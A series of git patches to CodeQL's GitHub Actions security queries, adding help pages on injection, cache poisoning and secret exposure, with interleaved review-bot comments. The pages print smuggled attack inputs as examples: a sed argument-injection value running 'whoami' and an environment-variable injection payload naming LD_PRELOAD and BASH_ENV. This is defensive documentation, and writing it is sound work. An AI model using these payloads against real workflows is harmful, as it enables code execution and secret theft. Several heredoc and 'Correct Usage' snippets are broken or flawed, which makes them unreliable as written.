actions/pr-on-self-hosted-runner * @tags actions * security - * external/cwe/cwe-284 - * testing * experimental + * external/cwe/cwe-284 */ import codeql.actions.security.SelfHostedQuery diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3700201c315..9721d666bd4 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql 
@@ -8,6 +8,7 @@ * @id actions/request-forgery * @tags actions * security + * experimental * external/cwe/cwe-918 */ From d8df3ff6b3ca33598e2968b015cd318587fa46b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:05:41 +0200 Subject: [PATCH 0468/1267] Use ControlCheck.dominates in the ImproperAccessControl query --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 3fc94d1aa22..2c7882604b2 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -20,11 +20,6 @@ where job.getATriggerEvent() = event and event.getName() = "pull_request_target" and event.getAnActivityType() = "synchronize" and - job.getAStep() = checkout and - ( - checkout.getIf() = check - or - checkout.getEnclosingJob().getIf() = check - ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", - check, check.toString() + check.dominates(checkout) +select checkout, "The checked-out code can be modified after the authorization check $@.", check, + check.toString() From 9411fac4d02de6af4214f4d1f983d99bce815d24 Mon Sep 17 00:00:00 2001 
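Review bot: In the `ImproperAccessControl.ql` hunk, replacing the old block with `check.dominates(checkout)` also removes `job.getAStep() = checkout`, the only visible link between `job`/`event` and the reported step. In the lines shown, `job` and `event` are now constrained only against each other. So unless `dominates` or the `from` clause (both outside the hunk) ties them together, any `pull_request_target` job with a `synchronize` activity type anywhere in the database would satisfy the first three conjuncts for every dominated checkout. That would flag checkouts in workflows that are not triggered that way. Keeping the link restores the original scoping: `job.getAStep() = checkout and check.dominates(checkout)`.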
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:06:06 +0200 Subject: [PATCH 0469/1267] New Descriptions --- .../CWE-077/EnvPathInjectionCritical.md | 37 ++++ .../CWE-077/EnvPathInjectionMedium.md | 37 ++++ .../CWE-077/EnvVarInjectionCritical.md | 117 ++++++++++++ .../Security/CWE-077/EnvVarInjectionMedium.md | 117 ++++++++++++ .../CWE-088/ArgumentInjectionCritical.md | 41 +++++ .../CWE-088/ArgumentInjectionMedium.md | 41 +++++ .../Security/CWE-094/CodeInjectionCritical.md | 26 ++- .../Security/CWE-094/CodeInjectionMedium.md | 26 ++- .../CWE-1395/UseOfKnownVulnerableAction.md | 13 ++ .../CWE-275/MissingActionsPermissions.md | 17 +- .../Security/CWE-285/ImproperAccessControl.md | 57 ++++++ .../CWE-312/ExcessiveSecretsExposure.md | 52 ++++++ .../CWE-312/UnmaskedSecretExposure.md | 37 ++++ .../CWE-349/CachePoisoningViaCodeInjection.md | 83 +++++++++ .../CWE-349/CachePoisoningViaDirectCache.md | 101 +++++++++++ .../CachePoisoningViaPoisonableStep.md | 85 +++++++++ .../UntrustedCheckoutTOCTOUCritical.md | 168 ++++++++++++++++++ .../CWE-367/UntrustedCheckoutTOCTOUMedium.md | 168 ++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.md | 63 +++++++ .../CWE-829/ArtifactPoisoningCritical.md | 72 ++++++++ .../CWE-829/ArtifactPoisoningMedium.md | 72 ++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.md | 27 +++ .../CWE-829/UntrustedCheckoutCritical.md | 137 ++++++++++++++ .../Security/CWE-829/UntrustedCheckoutHigh.md | 137 ++++++++++++++ .../CWE-829/UntrustedCheckoutMedium.md | 137 ++++++++++++++ 25 files changed, 1860 insertions(+), 8 deletions(-) create mode 100644 ql/src/Security/CWE-077/EnvPathInjectionCritical.md create mode 100644 ql/src/Security/CWE-077/EnvPathInjectionMedium.md create mode 100644 ql/src/Security/CWE-077/EnvVarInjectionCritical.md create mode 100644 ql/src/Security/CWE-077/EnvVarInjectionMedium.md create mode 100644 ql/src/Security/CWE-088/ArgumentInjectionCritical.md create mode 100644 ql/src/Security/CWE-088/ArgumentInjectionMedium.md 
create mode 100644 ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md create mode 100644 ql/src/Security/CWE-285/ImproperAccessControl.md create mode 100644 ql/src/Security/CWE-312/ExcessiveSecretsExposure.md create mode 100644 ql/src/Security/CWE-312/UnmaskedSecretExposure.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningCritical.md create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningMedium.md create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutCritical.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutHigh.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutMedium.md diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md new file mode 100644 index 00000000000..1891d41fa39 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md 
@@ -0,0 +1,37 @@ +# Environment Path Injection + +## Description + +GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. + +```bash +echo "$HOME/.local/bin" >> $GITHUB_PATH +``` + +If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. + +## Recommendations + +- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. + +## Examples + +### Incorrect Usage + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the path + env: + BODY: ${{ github.event.comment.body }} + run: | + PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+') + echo "$PATH" >> "$GITHUB_PATH" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md new file mode 100644 index 00000000000..1891d41fa39 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md 
@@ -0,0 +1,37 @@
+# Environment Path Injection
+
+## Description
+
+GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g.
+
+```bash
+echo "$HOME/.local/bin" >> $GITHUB_PATH
+```
+
+If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job.
+
+## Recommendations
+
+- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH.
+
+## Examples
+
+### Incorrect Usage
+
+Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps:
+
+```yaml
+steps:
+ - name: Set the path
+ env:
+ BODY: ${{ github.event.comment.body }}
+ run: |
+ PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+')
+ echo "$PATH" >> "$GITHUB_PATH"
+```
+
+If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps.
+
+## References
+
+- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions)
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md
new file mode 100644
index 00000000000..1d33a014d4b
--- /dev/null
+++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md
@@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file should lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define a multiline variables by using the following format: + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do Not Allow Untrusted Data to Influence Environment Variables**: + +- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. +- Validate and sanitize all inputs before using them in environment settings. + +2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: + +- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. 
**Use Unique Identifiers When Defining Multi Line Environment Variables**: + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" +``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "BODY=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: + +``` +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) 
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md new file mode 100644 index 00000000000..1d33a014d4b --- /dev/null +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md 
@@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file should lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define a multiline variables by using the following format: + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do Not Allow Untrusted Data to Influence Environment Variables**: + +- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. +- Validate and sanitize all inputs before using them in environment settings. + +2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: + +- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. 
**Use Unique Identifiers When Defining Multi Line Environment Variables**: + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" +``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "BODY=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: + +``` +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) 
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md new file mode 100644 index 00000000000..00dc3bad472 --- /dev/null +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md @@ -0,0 +1,41 @@ +# Argument Injection in GitHub Actions + +## Description + +Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. + +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendations + +When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments. + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets a user inject an arbitrary shell command through argument injection: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt +``` + +An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. + +## References + +- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html). +- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/) +- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/) +- [GTFOBins](https://gtfobins.github.io/) 
diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md new file mode 100644 index 00000000000..00dc3bad472 --- /dev/null +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md @@ -0,0 +1,41 @@ +# Argument Injection in GitHub Actions + +## Description + +Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. + +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendations + +When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments. + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets a user inject an arbitrary shell command through argument injection: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt +``` + +An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. + +## References + +- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html). +- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/) +- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/) +- [GTFOBins](https://gtfobins.github.io/) diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md index 9939c88eb19..cc85f68fb0d 100644 
--- a/ql/src/Security/CWE-094/CodeInjectionCritical.md +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md @@ -1,16 +1,20 @@ # Code Injection in GitHub Actions +## Description + Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. -## Recommendation +## Recommendations The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. -## Example +## Examples + +### Incorrect Usage The following example lets a user inject an arbitrary shell command: @@ -40,6 +44,8 @@ jobs: echo '${{ env.BODY }}' ``` +### Correct Usage + The following example uses shell syntax to read the environment variable and will prevent the attack: ```yaml @@ -53,6 +59,22 @@ jobs: echo "$BODY" ``` +The following example uses `process.env` to read environment variables within JavaScript code. + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + ## References - GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). 
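Review bot: The `process.env` example added under Correct Usage has a duplicated key, `- uses: uses: actions/github-script@v4`, so the step as printed is not something a reader can copy into a workflow. It should read `- uses: actions/github-script@v4`. The same line appears in the matching hunk of CodeInjectionMedium.md. Because this block is presented as the safe pattern, it is worth validating both copies with a workflow linter before merging.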
diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md index 9939c88eb19..cc85f68fb0d 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.md +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -1,16 +1,20 @@ # Code Injection in GitHub Actions +## Description + Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. -## Recommendation +## Recommendations The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. -## Example +## Examples + +### Incorrect Usage The following example lets a user inject an arbitrary shell command: @@ -40,6 +44,8 @@ jobs: echo '${{ env.BODY }}' ``` +### Correct Usage + The following example uses shell syntax to read the environment variable and will prevent the attack: ```yaml 
@@ -53,6 +59,22 @@ jobs: echo "$BODY" ``` +The following example uses `process.env` to read environment variables within JavaScript code. + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + ## References - GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md new file mode 100644 index 00000000000..61fab1d8ed4 --- /dev/null +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md @@ -0,0 +1,13 @@ +# Use of Actions with known vulnerabilities + +## Description + +The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize third-party GitHub Actions with known vulnerabilities. + +## Recommendations + +Either remove the component from the workflow or upgrade it to a version that is not vulnerable. + +## References + +- [GitHub Docs: Keeping your actions up to date with Dependabot](https://docs.github.com/en/code-security/dependabot/working-with-dependabot/keeping-your-actions-up-to-date-with-dependabot) diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md index 5c0e433c5cb..31ddab5329d 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.md +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md 
@@ -1,9 +1,11 @@ # Actions Job and Workflow Permissions are not set -A GitHub Actions job or workflow hasn't set permissions to restrict privileges to the workflow job. -A workflow job by default without the `permissions` key or a root workflow `permissions` will run with all the permissions which can be given to a workflow. +## Description -## Recommendation +A GitHub Actions job or workflow hasn't set explicit permissions to restrict privileges to the workflow job. +A workflow job by default without the `permissions` key or a root workflow `permissions` will run with the default permissions defined at the repository level. For organizations created before February 2023, including many significant OSS projects and corporations, the default permissions grant read-write access to repositories, and new repositories inherit these old, insecure permissions. + +## Recommendations Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task: @@ -12,11 +14,18 @@ name: "My workflow" permissions: contents: read pull-requests: write +``` -# or +or + +```yaml jobs: my-job: permissions: contents: read pull-requests: write ``` + +## References + +- [Assigning permissions to jobs](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/assigning-permissions-to-jobs) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.md b/ql/src/Security/CWE-285/ImproperAccessControl.md new file mode 100644 index 00000000000..c517ff98e58 --- /dev/null +++ b/ql/src/Security/CWE-285/ImproperAccessControl.md 
@@ -0,0 +1,57 @@ +# Improper Access Control + +## Description + +An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed. + +## Recommendations + +When using Label gates, make sure that the code cannot be modified after it has been reviewed and the label has been set. + +## Examples + +### Incorrect Usage + +The following example shows a job that requires the label `safe to test` to be set before running untrusted code. However, the workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. + +```yaml +on: + pull_request_target: + types: [opened, synchronize] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: ./cmd +``` + +### Correct Usage + +Make sure that the workflow only gets triggered when the label is set and use an inmutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. + +```yaml +on: + pull_request_target: + types: [labeled] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v3 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.sha}} + - run: ./cmd +``` + +## References + +- [Events that trigger workflows](https://docs.github.com/en/actions/writing-workflows/choosing-when-your-workflow-runs/events-that-trigger-workflows#pull_request_target) diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md new file mode 100644 index 00000000000..9351af5cf1e --- /dev/null 
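Review bot: The Correct Usage workflow still checks only that the pull request carries the `safe to test` label, and on a `labeled` trigger that holds whenever any label is added while the approval label is still attached, including after further commits were pushed. I would tie the gate to the label that fired the event, `if: github.event.label.name == 'safe to test'`, and state in the text that the label should be removed once the run starts so that each approval covers exactly one reviewed commit. The `if:` is also attached to the checkout step alone, so `- run: ./cmd` is not gated by it; moving the condition up to the job would cover both steps. Minor: `inmutable` should be `immutable`.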
+++ b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md @@ -0,0 +1,52 @@ +# Excessive Secrets Exposure + +## Description + +When the workflow runner cannot determine what secrets are needed to run the workflow, it will pass all the available secrets to the runner including organization and repository secrets. This violates the least privileged principle and increases the impact of a potential vulnerability affecting the workflow. + +## Recommendations + +Only pass those secrets that are needed by the workflow. Avoid using expressions such as `toJSON(secrets)` or dynamically accessed secrets such as `secrets[format('GH_PAT_%s', matrix.env)]` since the workflow will need to receive all secrets to decide at runtime which one needs to be used. + +## Examples + +### Incorrect Usage + +```yaml +env: + ALL_SECRETS: ${{ toJSON(secrets) }} +``` + +```yaml +strategy: + matrix: + env: [PROD, DEV] +env: + GH_TOKEN: ${{ secrets[format('GH_PAT_%s', matrix.env)] }} +``` + +### Correct Usage + +```yaml +env: + NEEDED_SECRET: ${{ secrets.GH_PAT }} +``` + +```yaml +strategy: + matrix: + env: [PROD, DEV] +--- +if: matrix.env == "PROD" +env: + GH_TOKEN: ${{ secrets.GH_PAT_PROD }} +--- +if: matrix.env == "DEV" +env: + GH_TOKEN: ${{ secrets.GH_PAT_DEV }} +``` + +## References + +- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow) +- [Job uses all secrets](https://github.com/boostsecurityio/poutine/blob/main/docs/content/en/rules/job_all_secrets.md) diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.md b/ql/src/Security/CWE-312/UnmaskedSecretExposure.md new file mode 100644 index 00000000000..6c681856a7b --- /dev/null +++ b/ql/src/Security/CWE-312/UnmaskedSecretExposure.md 
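Review bot: The second Correct Usage block compares against double-quoted strings, `if: matrix.env == "PROD"`, but GitHub Actions expressions accept only single-quoted string literals, so the recommended fix would fail to evaluate as written. It should be `if: matrix.env == 'PROD'` and `if: matrix.env == 'DEV'`. The `---` separators also make the block read as three separate YAML documents; showing the two entries as items under `steps:` would make the intended structure clear. Minor: `least privileged principle` reads better as `principle of least privilege`.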
@@ -0,0 +1,37 @@ +# Unmasked Secret Exposure + +## Description + +Secrets derived from other secrets are not know to the workflow runner and therefore not masked unless explicitly registered. + +## Recommendations + +Avoid defining non-plain secrets. For example, do not define a new secret containing a JSON object and then read properties out of it from the workflow since these read values will not be masked by the workflow runner. + +## Examples + +### Incorrect Usage + +```yaml +- env: + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + run: | + echo "$username" + echo "$password" +``` + +### Correct Usage + +```yaml +- env: + username: ${{ secrets.AZURE_CREDENTIALS_CLIENT_ID }} + password: ${{ secrets.AZURE_CREDENTIALS_CLIENT_SECRET }} + run: | + echo "$username" + echo "$password" +``` + +## References + +- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md new file mode 100644 index 00000000000..fb927f97c68 --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md 
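Review bot: The description says derived values are not masked "unless explicitly registered", but the page never shows how to register one, and the Correct Usage step still prints both credentials with `echo`. I would add a sentence that a value which has to be derived at runtime can be registered with the `add-mask` workflow command before use, for example `echo "::add-mask::$derived_value"` (placeholder variable name). The `echo "$username"` and `echo "$password"` lines in the Correct Usage block would be better replaced by a command that consumes the variables without writing them to the log. Minor: `not know` should be `not known`.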
@@ -0,0 +1,83 @@ +# Cache Poisoning in GitHub Actions + +## Description + +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. + +An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: + +1. Steal the cache access token and URL +2. Fill the cache to trigger eviction of legitimate entries +3. Poison cache entries with malicious payloads +4. Achieve code execution in privileged workflows that restore the poisoned cache + +This allows lateral movement from low-privileged to high-privileged workflows within a repository. + +### Cache Structure + +In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches. + +- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`. + +- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly. + +Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`. + +## Recommendations + +1. Avoid using caching in workflows that handle sensitive operations like releases. +2. If caching must be used: + - Validate restored cache contents before use + - Use short-lived, workflow-specific cache keys 